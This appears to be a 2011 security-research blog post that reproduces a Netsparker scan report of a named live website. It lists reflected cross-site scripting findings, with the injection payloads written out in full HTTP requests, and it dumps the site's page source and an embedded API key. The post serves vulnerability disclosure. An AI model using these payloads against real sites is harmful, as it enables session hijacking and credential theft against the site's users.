XSS, Cross Site Scripting in www.untraceableemail.net, CWE-79, CAPEC-86, DORK, GHDB

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.untraceableemail.net/boobitrap/eCh...
SCAN DATE
4/22/2011 11:47:10 PM
REPORT DATE
4/23/2011 12:11:08 AM
SCAN DURATION
00:23:25

Total Requests

10098

Average Speed

7.18 req/sec.
21
identified
6
confirmed
0
critical
11
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
10 %
MEDIUM
10 %
LOW
29 %
INFORMATION
52 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/boobitrap/eCheck.php Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
/boobitrap/images/ E-mail Address Disclosure No
/boobitrap/shadowbox/ Directory Listing (Apache) No
/boobitrap/validateUser.php Cookie Not Marked As HttpOnly Yes
Apache Version Disclosure No
/email_snitch/delete_history.php [Possible] Internal Path Leakage (*nix) No
/ezpay/checkPay.php deposit POST Cross-site Scripting Yes
/icons/ Forbidden Resource Yes
/login/newUserSignUp.php [Possible] Internal Path Leakage (*nix) No
/login/newUserSignUp2.php [Possible] Internal Path Leakage (*nix) No
/portscanner/biz/check_this_scan_status.php [Possible] Internal Path Leakage (*nix) No
/portscanner/biz/index.php.bak [Possible] Backup File Found No
/portscanner/index.php address_1 POST [Possible] Cross-site Scripting No
address_2 POST [Possible] Cross-site Scripting No
/portscanner/index.php.bak [Possible] Backup File Found No
/portsnitch/sendReport.php [Possible] Internal Path Leakage (*nix) No
/proxy/includes/process.php Programming Error Message No
[Possible] Internal Path Leakage (*nix) No
/proxy/index.php Redirect Response BODY Is Too Large Yes
/site/ [Possible] Internal Path Leakage (*nix) No
Cross-site Scripting

Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /ezpay/checkPay.php

/ezpay/checkPay.php CONFIRMED

http://www.untraceableemail.net/ezpay/checkPay.php

Parameters

Parameter Type Value
deposit POST '"--></style></script><script>alert(0x0007B1)</script>
submit POST Submit

Request

POST /ezpay/checkPay.php HTTP/1.1
Referer: http://www.untraceableemail.net/ezpay/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533759972015; PHPSESSID=33r94nhjt33oq5t4bf7d25ger3
Content-Length: 107
Accept-Encoding: gzip, deflate

deposit='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0007B1)%3c%2fscript%3e&submit=Submit

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:42:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 464
Connection: close
Content-Type: text/html; charset=UTF-8


</b><center>Processing....<br><img src=http://www.spoofem.com/site/spoofem/ajax-loader.gif></center><br><br> <html> <body onLoad='document.pay.submit()'> <form action='https://www.ligattsecurity.com/lsi/ezpay/working/_cc_payment_form.php' method='post' name='pay' id='payform' target='_self'> <input type='hidden' name='user_id' value=''> <input type='hidden' name='amount' value=\'\"--></style></script><script>netsparker(0x0007B1)</script>> </form></body>
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /boobitrap/eCheck.php

/boobitrap/eCheck.php CONFIRMED

http://www.untraceableemail.net/boobitrap/eCheck.php

Form target action

validateUser.php

Request

GET /boobitrap/eCheck.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:38:32 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: Apache=173.193.214.243.1303533512871593; path=/; expires=Sat, 28-May-11 04:38:32 GMT
Content-Length: 1740
Connection: close
Content-Type: text/html; charset=UTF-8


<style type="text/css"><!--.boobytraptext { font-family: Arial, Helvetica, sans-serif; font-weight:bold;}.boobytraptext { color: #CCC; }body { background-color: #000; text-align: center;}--></style><table width="13%" height="643" border="0" align="center" cellpadding="10"> <tr valign="top"> <td height="119"><img src="images/boobytrap.png" alt="" width="400" height="117" /></td> </tr> <tr> <td height="282"><p class="boobytraptext"> <span class="boobytraptext"><strong>BoobyTrap Will allow you to send a &quot;BoobyTrap&quot; email to your email account. A BoobyTrap email is an email that wil let you know if anyone is reading your emails without your knowledge. It will give you the IP address of the person as well as give you a location of where they were when they read the email.</strong></span> </p> <p class="boobytraptext"><strong>In some cases boobytrap will allow you to take pictures and recordings of the culprit if they have a webcam attached or built-in their computer.</strong></p></td> </tr> <tr> <td height="216" align="center" class="boobytraptext"><p>Enter your username and password</p> <form id="form1" name="form1" method="post" action="validateUser.php"> <p>username: <label> <input type="text" name="uname" id="username"> </label> </p> <p><br> password: <label> <input type="password" name="password" id="password"> </label> </p> <p> <label> <input type="submit" name="start" id="start" value="Submit" /> </label> </p></form> <p>&nbsp;</p></td> </tr></table><p align="center">&nbsp;</p><p>&nbsp;</p>
[Possible] Cross-site Scripting

[Possible] Cross-site Scripting

2 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes that there is a XSS (Cross-site Scripting) in here it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /portscanner/index.php

/portscanner/index.php

http://www.untraceableemail.net/portscanner/index.php

Parameters

Parameter Type Value
address_1 POST '"--></style></script><script>alert(0x0008C2)</script>
address_2 POST 3
cboCountry POST 3
cboState POST 3
city POST 3
company POST 3
email POST netsparker@example.com
fname POST Smith
host POST 3
lname POST Smith
phone POST 3
submit POST Scan
zip POST 3

Notes

This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.

Request

POST /portscanner/index.php HTTP/1.1
Referer: http://www.untraceableemail.net/portscanner/index.php.bak
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533816121990; PHPSESSID=htuomo3c5d0ifnrv0gllk4kd03
Content-Length: 236
Accept-Encoding: gzip, deflate

address_1='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0008C2)%3c%2fscript%3e&address_2=3&cboCountry=3&cboState=3&city=3&company=3&email=netsparker%40example.com&fname=Smith&host=3&lname=Smith&phone=3&submit=Scan&zip=3

Response

HTTP/1.1 302 Found
Date: Sat, 23 Apr 2011 04:44:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /portscanner/login.php
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="en"><head> <title>PORTSNITCH | LIGATT Security Suites</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="keywords" content=""> <meta name="description" content=""> <link rel="stylesheet" type="text/css" href="cluetip/jquery.cluetip.css"> <link rel="stylesheet" type="text/css" href="css/screen.css"> <link rel="stylesheet" type="text/css" href="css/dropdown.css"> <link rel="stylesheet" type="text/css" href="tablesorter/themes/blue/style.css" /> <link rel="stylesheet" type="text/css" href="shadowbox/shadowbox.css" /> <link rel="stylesheet" href="menu_style.css" type="text/css" /> <script type="text/javascript" src="shadowbox/shadowbox.js"></script> <script type="text/javascript"> /*Shadowbox.init({ handleOversize: "drag", displayNav: false, handleUnsupported: "remove", autoplayMovies: false, language: 'en', //players: ['img', 'html', 'iframe', 'qt', 'wmp', 'swf', 'flv'] player });*/ function target_phone_map() { //This will be a test to see if when we click it will open up a map Shadowbox.open({ player: 'html', content: '', height: 350, width: 350, options: { onFinish: function(item){ if(GBrowserIsCompatible()){ //create map canvas var mapPhone = new GMap2(document.getElementById(Shadowbox.contentId())); //set map type mapPhone.setMapType(G_SATELLITE_MAP); //set lat and long for map mapPhone.setCenter(new GLatLng(, ), 17); //set user interface to default which includes the zoom tool, and four map type buttons mapPhone.setUIToDefault(); //add point with set lat and long for point var point = new GLatLng(,); mapPhone.addOverlay(new GMarker(point)); } } } }); } function target_ip_map() { //This will be a test to see if when we click it will open up a map Shadowbox.open({ player: 'html', content: '', height: 350, width: 350, options: { onFinish: function(item){ if(GBrowserIsCompatible()){ //create map canvas var map = new GMap2(document.getElementById(Shadowbox.contentId())); //set map type map.setMapType(G_SATELLITE_MAP); //set lat and long for map map.setCenter(new GLatLng(0, 0), 17); //set user interface to default which includes the zoom tool, and four map type buttons map.setUIToDefault(); //add point with set lat and long for point var point = new GLatLng(0,0); map.addOverlay(new GMarker(point)); } } } }); } function target_address_map() { //This will be a test to see if when we click it will open up a map Shadowbox.open({ player: 'html', content: '', height: 350, width: 350, options: { onFinish: function(item){ if(GBrowserIsCompatible()){ /*Code for the address map*/ mapAdd = new GMap2(document.getElementById(Shadowbox.contentId())); mapAdd.setMapType(G_SATELLITE_MAP); mapAdd.setCenter(new GLatLng(37.4419, -122.1419), 15); mapAdd.setUIToDefault(); geocoder = new GClientGeocoder(); var address = "\'\"--></style></script><script>netsparker(0x0008C2)</script> 3 3 3 3 3"; if (geocoder) { geocoder.getLatLng( address, function(point) { if (!point) { alert(address + " not found"); } else { mapAdd.setCenter(point, 15); var marker = new GMarker(point); mapAdd.addOverlay(marker); //marker.openInfoWindowHtml(address); } } ); } } } } }); } </script> <script src="http://code.jquery.com/jquery-latest.js"></script> <script type="text/javascript" src="cluetip/jquery.cluetip.js"></script> <script type="text/javascript" src="library/jquery_calls.js"></script> <script type="text/javascript" src="library/country.js"></script> <script type="text/javascript" src="library/ajax.js"></script> <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;sensor=false&amp;key=ABQIAAAAiKM1iuk5Njtbop701BMpmhSpvELy0EdfA-aKJpnzXJx4Ryo4DBQ0sYoJ1vmKceddiB5Rj8ONIGtQ-A" type="text/javascript"></script> <script type="text/javascript" src="js/helpers.js"></script> <script type="text/javascript" src="js/date.js"></script> <script type="text/javascript" src="js/form.js"></script> <script src="jquery.tablesorter.js"></script> <script src="jquery.tablesorter.pager"></script> <script language="Javascript">var finished = false;function ltrim ( s ){return s.replace( /^\s*/, "" );}function twoOrMore(form){ var over = 0; var myForm = document.forms[form]; for( var i=0; i < myForm.length; i++ ) { if (myForm.elements[i].type == "checkbox") { if (myForm.elements[i].checked == true) { over++; if (over > 1) { alert("You can only send one IP address to TattleTell!"); return false; } } } } if (over == 0) { alert("Please check at least one IP address to send to TattleTell"); return false; } else { document.getElementById('history').setAttribute('action', '/tattletell/addtarget.php'); document.getElementById('history').submit(); }}function twoOrMorePC211(form){ var over = 0; var myForm = document.forms[form]; for( var i=0; i < myForm.length; i++ ) { if (myForm.elements[i].type == "checkbox") { if (myForm.elements[i].checked == true) { over++; if (over > 1) { alert("You can only send one IP address to PC211!"); return false; } } } } if (over == 0) { alert("Please check at one IP address to send to PC211"); return false; } else { document.getElementById('history').setAttribute('action', '/pc211/exploit.php'); document.getElementById('history').submit(); }}function twoOrMorePurchase(form){ var over = 0; var myForm = document.forms[form]; for( var i=0; i < myForm.length; i++ ) { if (myForm.elements[i].type == "checkbox") { if (myForm.elements[i].checked == true) { over++; if (over > 1) { alert("You can only purchase one report at a time!"); return false; } } } } if (over == 0) { alert("Please check at one IP address to purchase"); return false; } else { document.getElementById('history').setAttribute('action', 'chkStatus.php'); document.getElementById('history').submit(); }}function twoOrMoreSendReport(form){ var over = 0; var myForm = document.forms[form]; for( var i=0; i < myForm.length; i++ ) { if (myForm.elements[i].type == "checkbox") { if (myForm.elements[i].checked == true) { over++; if (over > 1) { alert("You can only send one report at a time!"); return false; } } } } if (over == 0) { alert("Please check at one least report to send"); return false; } else { document.getElementById('history').setAttribute('action', 'sendReport.php'); document.getElementById('history').submit(); }}function selectToggle(toggle, form){ var myForm = document.forms[form]; for( var i=0; i < myForm.length; i++ ) { if (myForm.elements[i].type == "checkbox") { if(toggle) { myForm.elements[i].checked = "checked"; } else { myForm.elements[i].checked = ""; } } }}function sendToTattle(){ document.getElementById('history').setAttribute('action', '/tattletell/addtarget.php'); document.getElementById('history').submit();}function deleteStuff(){document.getElementById('history').setAttribute('action','delete_history.php');document.getElementById('history').submit();}function go_back_to_index() { document.location='/portscanner/index.php';}var interval_id; function check_this_scan_status(this_id) { var strURL = "check_this_scan_status.php"; var xmlHttpReq = false; var self = this; // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4 && !finished) { var real_string = ltrim(self.xmlHttpReq.responseText); if( real_string.charAt(0) == "~") //if(self.xmlHttpReq.responseText.charAt(0)=='~') { updatepage(self.xmlHttpReq.responseText); finished = true; //Load the function //test(); initialize(); //The other functions to load the address map initializeAddress(); showAddress(); //One more function that will load the phone number map initializePhone(); } else { updatepage(self.xmlHttpReq.responseText); } //updatepage(self.xmlHttpReq.responseText); } } self.xmlHttpReq.send(getquerystring(this_id));}function getquerystring(id) { //var form = document.forms['f1']; //var word = form.word.value; //qstr = 'w=' + escape(word); // NOTE: no '?' before querystring qstr = 'id=' + id; return qstr;}function updatepage(str){ document.getElementById("update_pane").innerHTML = str;}</script> <script>function initialize() { //create map canvas var map = new GMap2(document.getElementById("map_canvas")); //set map type map.setMapType(G_SATELLITE_MAP); //set lat and long for map map.setCenter(new GLatLng(0, 0), 17); //set user interface to default which includes the zoom tool, and four map type buttons map.setUIToDefault(); //add point with set lat and long for point var point = new GLatLng(0,0); map.addOverlay(new GMarker(point)); }</script><script> var mapAdd = null; var geocoder = null; function initializeAddress() { mapAdd = new GMap2(document.getElementById("map_canvas_address")); mapAdd.setMapType(G_SATELLITE_MAP); mapAdd.setCenter(new GLatLng(37.4419, -122.1419), 15); mapAdd.setUIToDefault(); geocoder = new GClientGeocoder(); } function showAddress() { var address = "\'\"--></style></script><script>netsparker(0x0008C2)</script> 3 3 3 3 3"; if (geocoder) { geocoder.getLatLng( address, function(point) { if (!point) { alert(address + " not found"); } else { mapAdd.setCenter(point, 15); var marker = new GMarker(point); mapAdd.addOverlay(marker); //marker.openInfoWindowHtml(address); } } ); } }</script><script>function initializePhone() { //create map canvas var mapPhone = new GMap2(document.getElementById("map_canvas_phone")); //set map type mapPhone.setMapType(G_SATELLITE_MAP); //set lat and long for map mapPhone.setCenter(new GLatLng(, ), 17); //set user interface to default which includes the zoom tool, and four map type buttons mapPhone.setUIToDefault(); //add point with set lat and long for point var point = new GLatLng(,); mapPhone.addOverlay(new GMarker(point));}</script> <script type="text/javascript"> $(document).ready(function(){ Shadowbox.init({ handleOversize: "drag", displayNav: false, handleUnsupported: "remove", autoplayMovies: false, language: 'en', players: ['img', 'html', 'iframe', 'qt', 'wmp', 'swf', 'flv'] }); $('a.basic').cluetip({ width: '300px', height: '300px', showTitle: true }); //The table for the scans $("#myTable").tablesorter({ sortList:[[0,0]], widthFixed: true, headers: { 7: { sorter: false }, 8: { sorter: false } } }); /*$(".menu2 a").append("<em></em>"); $(".menu2 a").hover(function() { $(this).find("em").animate({opacity: "show", top: "-75"}, "slow"); var hoverText = $(this).attr("title"); $(this).find("em").text(hoverText); }, function() { $(this).find("em").animate({opacity: "hide", top: "-85"}, "fast"); });*/ }); </script> </head><body> <div class="wrapper"> <div class="nav-wrapper"> <div class="nav"> <ul id="navigation"> <li class=""> <a href="/ezpay/index.php"> <span class="menu-left"></span> <span class="menu-mid">My Account</span> <span class="menu-right"></span> </a> <div class="sub"> <ul> <li> <a href="/ezpay/subAccntForm.php">Sub Account</a> </li> </ul> <div class="btm-bg"></div> </div> </li> <li class=""> <a href="/tattletell/yourips.php"> <span class="menu-left"></span> <span class="menu-mid">Tattletell</span> <span class="menu-right"></span> </a> <div class="sub"> <ul> <li> <a href="/tattletell/yourips.php">Your IP Monitoring</a> </li> <li> <a href="/tattletell/addtarget.php">Add Target</a> </li> <li> <a href="/tattletell/signup.php">Purchase IPs</a> </li> </ul> <div class="btm-bg"></div> </div> </li> <li class=""> <a href="/email_snitch/index.php"> <span class="menu-left"></span> <span class="menu-mid">IPSnitch</span> <span class="menu-right"></span> </a> <div class="sub"> <ul> <li> <a href="/email_snitch/createSnitch.php">Add Target</a> </li> </ul> <div class="btm-bg"></div> </div> </li> <li class="active"> <a href="/portscanner/index.php"> <span class="menu-left"></span> <span class="menu-mid">PortSnitch</span> <span class="menu-right"></span> </a> </li> <li class=""> <a href="/proxy/spoofnetACCESS.php"> <span class="menu-left"></span> <span class="menu-mid">Spoofnet</span> <span class="menu-right"></span> </a> </li> <li class=""> <a href="/portsnitch/index.php"> <span class="menu-left"></span> <span class="menu-mid">Recon</span> <span class="menu-right"></span> </a> </li> <li class=""> <a href="/pc211/index.php"> <span class="menu-left"></span> <span class="menu-mid">PC211</span> <span class="menu-right"></span> </a> </li> <li class=""> <a href="/spoofem_suites/index.php"> <span class="menu-left"></span> <span class="menu-mid">SPOOFEM</span> <span class="menu-right"></span> </a> </li> <li class=""> <a href="/tools/index.php"> <span class="menu-left"></span> <span class="menu-mid">Tools</span> <span class="menu-right"></span> </a> </li> <li class=""> <a href="#"> <span class="menu-left"></span> <span class="menu-mid">Help</span> <span class="menu-right"></span> </a> </li> <li class="last"> <a href="/login/logout.php"> <span class="menu-left"></span> <span class="menu-mid">Logout</span> <span class="menu-right"></span> </a> </li> </ul> </div> </div><div class="content" style="width:800px;"><!-- begin top content --> <div style = "float: left"> <img src='portsnitchfinal.png' width="370px" /></div><div style = "float: left; margin-left: 2em; width:400px;"> <p align="justify"><font size="2"><b>PORTSNITCH</b> - For those that do not know what a "port" is, let me give you an example. Let’s say that your house is a computer, and your house has 65,000 windows and doors. Now imagine a potential burglar walking around your house checking to see if you have any open doors or windows. The burglar is not opening any of the doors or windows, but is checking to see if you left any of them open. We called him/her a "potential" burglar because until they illicitly enter an open door or window in which you left open, he/she has not broken any laws. That is the same as a hacker. Before a hacker can break-in to your computer, they perform what is called a "Port Scan" or “Vulnerability” check to see if you have any open ports (doors or windows). Once the hacker finds the open ports, he/she will then figure out which tools they will need to pry the door or window wide open, without setting off any alarms. These tools are called "Exploits."</font></p> <br /> <br /> </div><!-- end top content --> <div style="float:left;"..
- /portscanner/index.php

/portscanner/index.php

http://www.untraceableemail.net/portscanner/index.php

Parameters

Parameter Type Value
address_1 POST 3
address_2 POST '"--></style></script><script>alert(0x000B9A)</script>
cboCountry POST 3
cboState POST 3
city POST 3
company POST 3
email POST netsparker@example.com
fname POST Smith
host POST 3
lname POST Smith
phone POST 3
submit POST Scan
zip POST 3

Notes

This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.

Request

POST /portscanner/index.php HTTP/1.1
Referer: http://www.untraceableemail.net/portscanner/index.php.bak
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533816121990; PHPSESSID=5mibs8ua4qsr2r7fttsj8giks3
Content-Length: 236
Accept-Encoding: gzip, deflate

address_1=3&address_2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000B9A)%3c%2fscript%3e&cboCountry=3&cboState=3&city=3&company=3&email=netsparker%40example.com&fname=Smith&host=3&lname=Smith&phone=3&submit=Scan&zip=3

Response

HTTP/1.1 302 Found
Date: Sat, 23 Apr 2011 04:54:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /portscanner/login.php
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="en"><head> <title>PORTSNITCH | LIGATT Security Suites</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="keywords" content=""> <meta name="description" content=""> <link rel="stylesheet" type="text/css" href="cluetip/jquery.cluetip.css"> <link rel="stylesheet" type="text/css" href="css/screen.css"> <link rel="stylesheet" type="text/css" href="css/dropdown.css"> <link rel="stylesheet" type="text/css" href="tablesorter/themes/blue/style.css" /> <link rel="stylesheet" type="text/css" href="shadowbox/shadowbox.css" /> <link rel="stylesheet" href="menu_style.css" type="text/css" /> <script type="text/javascript" src="shadowbox/shadowbox.js"></script> <script type="text/javascript"> /*Shadowbox.init({ handleOversize: "drag", displayNav: false, handleUnsupported: "remove", autoplayMovies: false, language: 'en', //players: ['img', 'html', 'iframe', 'qt', 'wmp', 'swf', 'flv'] player });*/ function target_phone_map() { //This will be a test to see if when we click it will open up a map Shadowbox.open({ player: 'html', content: '', height: 350, width: 350, options: { onFinish: function(item){ if(GBrowserIsCompatible()){ //create map canvas var mapPhone = new GMap2(document.getElementById(Shadowbox.contentId())); //set map type mapPhone.setMapType(G_SATELLITE_MAP); //set lat and long for map mapPhone.setCenter(new GLatLng(, ), 17); //set user interface to default which includes the zoom tool, and four map type buttons mapPhone.setUIToDefault(); //add point with set lat and long for point var point = new GLatLng(,); mapPhone.addOverlay(new GMarker(point)); } } } }); } function target_ip_map() { //This will be a test to see if when we click it will open up a map Shadowbox.open({ player: 'html', content: '', height: 350, width: 350, options: { onFinish: function(item){ if(GBrowserIsCompatible()){ //create map canvas var map = new GMap2(document.getElementById(Shadowbox.contentId())); //set map type map.setMapType(G_SATELLITE_MAP); //set lat and long for map map.setCenter(new GLatLng(0, 0), 17); //set user interface to default which includes the zoom tool, and four map type buttons map.setUIToDefault(); //add point with set lat and long for point var point = new GLatLng(0,0); map.addOverlay(new GMarker(point)); } } } }); } function target_address_map() { //This will be a test to see if when we click it will open up a map Shadowbox.open({ player: 'html', content: '', height: 350, width: 350, options: { onFinish: function(item){ if(GBrowserIsCompatible()){ /*Code for the address map*/ mapAdd = new GMap2(document.getElementById(Shadowbox.contentId())); mapAdd.setMapType(G_SATELLITE_MAP); mapAdd.setCenter(new GLatLng(37.4419, -122.1419), 15); mapAdd.setUIToDefault(); geocoder = new GClientGeocoder(); var address = "3 \'\"--></style></script><script>netsparker(0x000B9A)</script> 3 3 3 3"; if (geocoder) { geocoder.getLatLng( address, function(point) { if (!point) { alert(address + " not found"); } else { mapAdd.setCenter(point, 15); var marker = new GMarker(point); mapAdd.addOverlay(marker); //marker.openInfoWindowHtml(address); } } ); } } } } }); } </script> <script src="http://code.jquery.com/jquery-latest.js"></script> <script type="text/javascript" src="cluetip/jquery.cluetip.js"></script> <script type="text/javascript" src="library/jquery_calls.js"></script> <script type="text/javascript" src="library/country.js"></script> <script type="text/javascript" src="library/ajax.js"></script> <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;sensor=false&amp;key=ABQIAAAAiKM1iuk5Njtbop701BMpmhSpvELy0EdfA-aKJpnzXJx4Ryo4DBQ0sYoJ1vmKceddiB5Rj8ONIGtQ-A" type="text/javascript"></script> <script type="text/javascript" src="js/helpers.js"></script> <script type="text/javascript" src="js/date.js"></script> <script type="text/javascript" src="js/form.js"></script> <script src="jquery.tablesorter.js"></script> <script src="jquery.tablesorter.pager"></script> <script language="Javascript">var finished = false;function ltrim ( s ){return s.replace( /^\s*/, "" );}function twoOrMore(form){ var over = 0; var myForm = document.forms[form]; for( var i=0; i < myForm.length; i++ ) { if (myForm.elements[i].type == "checkbox") { if (myForm.elements[i].checked == true) { over++; if (over > 1) { alert("You can only send one IP address to TattleTell!"); return false; } } } } if (over == 0) { alert("Please check at least one IP address to send to TattleTell"); return false; } else { document.getElementById('history').setAttribute('action', '/tattletell/addtarget.php'); document.getElementById('history').submit(); }}function twoOrMorePC211(form){ var over = 0; var myForm = document.forms[form]; for( var i=0; i < myForm.length; i++ ) { if (myForm.elements[i].type == "checkbox") { if (myForm.elements[i].checked == true) { over++; if (over > 1) { alert("You can only send one IP address to PC211!"); return false; } } } } if (over == 0) { alert("Please check at one IP address to send to PC211"); return false; } else { document.getElementById('history').setAttribute('action', '/pc211/exploit.php'); document.getElementById('history').submit(); }}function twoOrMorePurchase(form){ var over = 0; var myForm = document.forms[form]; for( var i=0; i < myForm.length; i++ ) { if (myForm.elements[i].type == "checkbox") { if (myForm.elements[i].checked == true) { over++; if (over > 1) { alert("You can only purchase one report at a time!"); return false; } } } } if (over == 0) { alert("Please check at one IP address to purchase"); return false; } else { document.getElementById('history').setAttribute('action', 'chkStatus.php'); document.getElementById('history').submit(); }}function twoOrMoreSendReport(form){ var over = 0; var myForm = document.forms[form]; for( var i=0; i < myForm.length; i++ ) { if (myForm.elements[i].type == "checkbox") { if (myForm.elements[i].checked == true) { over++; if (over > 1) { alert("You can only send one report at a time!"); return false; } } } } if (over == 0) { alert("Please check at one least report to send"); return false; } else { document.getElementById('history').setAttribute('action', 'sendReport.php'); document.getElementById('history').submit(); }}function selectToggle(toggle, form){ var myForm = document.forms[form]; for( var i=0; i < myForm.length; i++ ) { if (myForm.elements[i].type == "checkbox") { if(toggle) { myForm.elements[i].checked = "checked"; } else { myForm.elements[i].checked = ""; } } }}function sendToTattle(){ document.getElementById('history').setAttribute('action', '/tattletell/addtarget.php'); document.getElementById('history').submit();}function deleteStuff(){document.getElementById('history').setAttribute('action','delete_history.php');document.getElementById('history').submit();}function go_back_to_index() { document.location='/portscanner/index.php';}var interval_id; function check_this_scan_status(this_id) { var strURL = "check_this_scan_status.php"; var xmlHttpReq = false; var self = this; // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4 && !finished) { var real_string = ltrim(self.xmlHttpReq.responseText); if( real_string.charAt(0) == "~") //if(self.xmlHttpReq.responseText.charAt(0)=='~') { updatepage(self.xmlHttpReq.responseText); finished = true; //Load the function //test(); initialize(); //The other functions to load the address map initializeAddress(); showAddress(); //One more function 